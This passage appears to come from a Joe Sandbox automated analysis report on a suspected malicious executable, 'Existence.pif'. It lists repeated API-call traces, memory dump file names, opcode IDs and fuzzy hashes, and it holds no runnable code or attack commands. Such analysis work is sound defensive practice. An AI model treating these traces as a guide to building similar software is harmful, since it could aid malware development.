                                                                                                                                                                                          • _free.LIBCMT ref: 00761BAE
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free$FileModuleName
                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif
                                                                                                                                                                                          • API String ID: 2506810119-250674962
                                                                                                                                                                                          • Opcode ID: bc8ba8671f374b991bb59b672947f4b7565bdee9de760392eb9935cb09ec4dba
                                                                                                                                                                                          • Instruction ID: 439629756c8e21cdecbcf3abbd0d7d0c996b772e6c02cfc3180a0e053c8659e4
                                                                                                                                                                                          • Opcode Fuzzy Hash: bc8ba8671f374b991bb59b672947f4b7565bdee9de760392eb9935cb09ec4dba
                                                                                                                                                                                          • Instruction Fuzzy Hash: E13172B1A00218EFCB61DF99DC8DD9EBBFCEB85710B5841A6EC0997211E7B44E41DB90
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0079CBB1
                                                                                                                                                                                          • DeleteMenu.USER32(?,00000007,00000000), ref: 0079CBF7
                                                                                                                                                                                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,008029C0,01145390), ref: 0079CC40
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Menu$Delete$InfoItem
                                                                                                                                                                                          • String ID: 0
                                                                                                                                                                                          • API String ID: 135850232-4108050209
                                                                                                                                                                                          • Opcode ID: 6941d8e08bff876b1260f411bd1b0e3a49c038623988d84c7b28d4c7dbb7c75a
                                                                                                                                                                                          • Instruction ID: 2b06b5ba0134e5b694b3a6285a6f6494298a9f20b0c9b10eed5f9b23e4e5b2f9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6941d8e08bff876b1260f411bd1b0e3a49c038623988d84c7b28d4c7dbb7c75a
                                                                                                                                                                                          • Instruction Fuzzy Hash: F641C071204302DFDF21DF24E985B1ABBE8AF89724F04461DF4A997291D738E904CB62
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,007CDCD0,00000000,?,?,?,?), ref: 007C4F48
                                                                                                                                                                                          • GetWindowLongW.USER32 ref: 007C4F65
                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 007C4F75
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$Long
                                                                                                                                                                                          • String ID: SysTreeView32
                                                                                                                                                                                          • API String ID: 847901565-1698111956
                                                                                                                                                                                          • Opcode ID: 8cc7a20c238c2d6ea109dfe79e189bef0e8669baa1204d81baf5488db8e11153
                                                                                                                                                                                          • Instruction ID: 68e569a06c150c158a46bcb58f9da5a37934b6b9f929a6f8e6fef7e3c2a0c50c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8cc7a20c238c2d6ea109dfe79e189bef0e8669baa1204d81baf5488db8e11153
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7931AD71200205AFEB218E38CC55FEA7BA9EB08334F24472DF979A21E0C778AC509B50
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 007B3DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,007B3AD4,?,?), ref: 007B3DD5
                                                                                                                                                                                          • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 007B3AD7
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007B3AF8
                                                                                                                                                                                          • htons.WSOCK32(00000000,?,?,00000000), ref: 007B3B63
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                                                                                                                          • String ID: 255.255.255.255
                                                                                                                                                                                          • API String ID: 946324512-2422070025
                                                                                                                                                                                          • Opcode ID: 52c79664ed145ad6b5a030ec4847e345aca04c77946052f6898fffa5510cb2dc
                                                                                                                                                                                          • Instruction ID: 6c056e5f55821702db92087efb6b07e955830de6e509aa683e61da5684bb48e3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 52c79664ed145ad6b5a030ec4847e345aca04c77946052f6898fffa5510cb2dc
                                                                                                                                                                                          • Instruction Fuzzy Hash: DF31B3B9600241DFDB10CF68C589FEA7BE0EF14318F248159E8168B396D779EE85CB60
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 007C49DC
                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 007C49F0
                                                                                                                                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 007C4A14
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$Window
                                                                                                                                                                                          • String ID: SysMonthCal32
                                                                                                                                                                                          • API String ID: 2326795674-1439706946
                                                                                                                                                                                          • Opcode ID: 17ab638b9426d52d6022c50c8d5de2ed9ce10374228d38d4ad6e56e809715881
                                                                                                                                                                                          • Instruction ID: 30bb8a414eba8fbed365a20b7a78322c546d7e4af26f18644f8fef55dff2ae81
                                                                                                                                                                                          • Opcode Fuzzy Hash: 17ab638b9426d52d6022c50c8d5de2ed9ce10374228d38d4ad6e56e809715881
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6221BF32600229BBDF218F50CC46FEF3B69EF48718F114218FA157B190D6B9AC51DB90
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 007C51A3
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 007C51B1
                                                                                                                                                                                          • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 007C51B8
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$DestroyWindow
                                                                                                                                                                                          • String ID: msctls_updown32
                                                                                                                                                                                          • API String ID: 4014797782-2298589950
                                                                                                                                                                                          • Opcode ID: 0ee9c4853a8b7edb5dfff35f3e9b4f09d7b15ea754748b505b093e842ed6d038
                                                                                                                                                                                          • Instruction ID: 2513b9f10155c632c91fa83d49b1d7b6cb1c04d15f6ad9728a203bbc99a08071
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ee9c4853a8b7edb5dfff35f3e9b4f09d7b15ea754748b505b093e842ed6d038
                                                                                                                                                                                          • Instruction Fuzzy Hash: 962160B5600609AFDB10DF28CC89EB737ADEB593A4B04015DFA009B361CB79EC51CBA0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 007C42DC
                                                                                                                                                                                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 007C42EC
                                                                                                                                                                                          • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 007C4312
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$MoveWindow
                                                                                                                                                                                          • String ID: Listbox
                                                                                                                                                                                          • API String ID: 3315199576-2633736733
                                                                                                                                                                                          • Opcode ID: cbde8687637645eadfeec38c8174ab9150f481b0ddeabdb0a32fc46664150c0f
                                                                                                                                                                                          • Instruction ID: 4e553ccab27b5e54ab5a75067e3d2d96976919f5fa4e3a0f40dd4ae438d7fe12
                                                                                                                                                                                          • Opcode Fuzzy Hash: cbde8687637645eadfeec38c8174ab9150f481b0ddeabdb0a32fc46664150c0f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 74218372610118BBEF218F94DC85FAB3B6EEB89754F11812CF9009B190C6759C51C790
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 007A544D
                                                                                                                                                                                          • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 007A54A1
                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,?,?,007CDCD0), ref: 007A5515
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorMode$InformationVolume
                                                                                                                                                                                          • String ID: %lu
                                                                                                                                                                                          • API String ID: 2507767853-685833217
                                                                                                                                                                                          • Opcode ID: f9f1bd9780cbfb9599fe35e98a59c05fd77ed487c2655c245b0e9c467407bce0
                                                                                                                                                                                          • Instruction ID: 635abd4c198d548be8fb7bd0cca8a6d344a94f3c6f557d0b4112f030637f5bfc
                                                                                                                                                                                          • Opcode Fuzzy Hash: f9f1bd9780cbfb9599fe35e98a59c05fd77ed487c2655c245b0e9c467407bce0
                                                                                                                                                                                          • Instruction Fuzzy Hash: BD317371A00108EFDB10DF64C885EAA77F9EF09304F1480A9F509DB262D779EE45CB61
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 007C4CED
                                                                                                                                                                                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 007C4D02
                                                                                                                                                                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 007C4D0F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                          • String ID: msctls_trackbar32
                                                                                                                                                                                          • API String ID: 3850602802-1010561917
                                                                                                                                                                                          • Opcode ID: 830bb7141b35497fe273eaa360853f67b3fe3f47bc86790d3853d891c61aa061
                                                                                                                                                                                          • Instruction ID: 0ce3dd5099716814eaf99bd9a48e0ddeca04ba411fe29291d52ae5e199eba548
                                                                                                                                                                                          • Opcode Fuzzy Hash: 830bb7141b35497fe273eaa360853f67b3fe3f47bc86790d3853d891c61aa061
                                                                                                                                                                                          • Instruction Fuzzy Hash: F6110671340248BEEF205F65CC06FAB37A8EF85B65F11052CFA51E60A0D675DC50DB20
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00738577: _wcslen.LIBCMT ref: 0073858A
                                                                                                                                                                                            • Part of subcall function 007936F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00793712
                                                                                                                                                                                            • Part of subcall function 007936F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00793723
                                                                                                                                                                                            • Part of subcall function 007936F4: GetCurrentThreadId.KERNEL32 ref: 0079372A
                                                                                                                                                                                            • Part of subcall function 007936F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00793731
                                                                                                                                                                                          • GetFocus.USER32 ref: 007938C4
                                                                                                                                                                                            • Part of subcall function 0079373B: GetParent.USER32(00000000), ref: 00793746
                                                                                                                                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 0079390F
                                                                                                                                                                                          • EnumChildWindows.USER32(?,00793987), ref: 00793937
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                                                                                                          • String ID: %s%d
                                                                                                                                                                                          • API String ID: 1272988791-1110647743
                                                                                                                                                                                          • Opcode ID: dd39491dee5bf5f1c200758ed891fbe21085951ae5bd5e83e3ff868d9b95b695
                                                                                                                                                                                          • Instruction ID: de889981e124ed8f72886c09f8cad4a8c87b014c10eb4b40e1433fd2c17afdb2
                                                                                                                                                                                          • Opcode Fuzzy Hash: dd39491dee5bf5f1c200758ed891fbe21085951ae5bd5e83e3ff868d9b95b695
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B11A8B1600205ABDF11BF749C89EED77699F94354F048079F9099B252DF785A05CB30
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 007C6360
                                                                                                                                                                                          • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 007C638D
                                                                                                                                                                                          • DrawMenuBar.USER32(?), ref: 007C639C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Menu$InfoItem$Draw
                                                                                                                                                                                          • String ID: 0
                                                                                                                                                                                          • API String ID: 3227129158-4108050209
                                                                                                                                                                                          • Opcode ID: 22b7df874ad3920a2a96c9b1ff3e0d5843deeea9781a9f7691d8d3986a0f939f
                                                                                                                                                                                          • Instruction ID: e66fa3c1b015849cedd77a56a12a99ee5a30cf51184ab69658020ee14247d8b1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 22b7df874ad3920a2a96c9b1ff3e0d5843deeea9781a9f7691d8d3986a0f939f
                                                                                                                                                                                          • Instruction Fuzzy Hash: D7016971500258EFEB219F51DC88FAEBBB4FF44351F1080ADE84AD6151DB788A95EF22
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: b818791a337a0178c7f7ded64a552242c483dee44fd7c7bd68119fae169e11cc
                                                                                                                                                                                          • Instruction ID: 0d5a364b5d632886040995bcceb65efe5098daf84cde4de518098c2fce598955
                                                                                                                                                                                          • Opcode Fuzzy Hash: b818791a337a0178c7f7ded64a552242c483dee44fd7c7bd68119fae169e11cc
                                                                                                                                                                                          • Instruction Fuzzy Hash: EEC18B75A1020AEFDB04CFA4D884EAEB7B5FF48714F108598E905EB251D735EE81DB90
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __alldvrm$_strrchr
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1036877536-0
                                                                                                                                                                                          • Opcode ID: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                                          • Instruction ID: acff5511a8827c87f86c8357ad4d1c59794d4c7218f57584259dce1f4e5bb775
                                                                                                                                                                                          • Opcode Fuzzy Hash: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                                          • Instruction Fuzzy Hash: 10A136729003869FDB11CE19C8927AEBFE5FF51354F284169ED969B342D63C8D41C750
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,007D0BD4,?), ref: 00790EE0
                                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,007D0BD4,?), ref: 00790EF8
                                                                                                                                                                                          • CLSIDFromProgID.OLE32(?,?,00000000,007CDCE0,000000FF,?,00000000,00000800,00000000,?,007D0BD4,?), ref: 00790F1D
                                                                                                                                                                                          • _memcmp.LIBVCRUNTIME ref: 00790F3E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
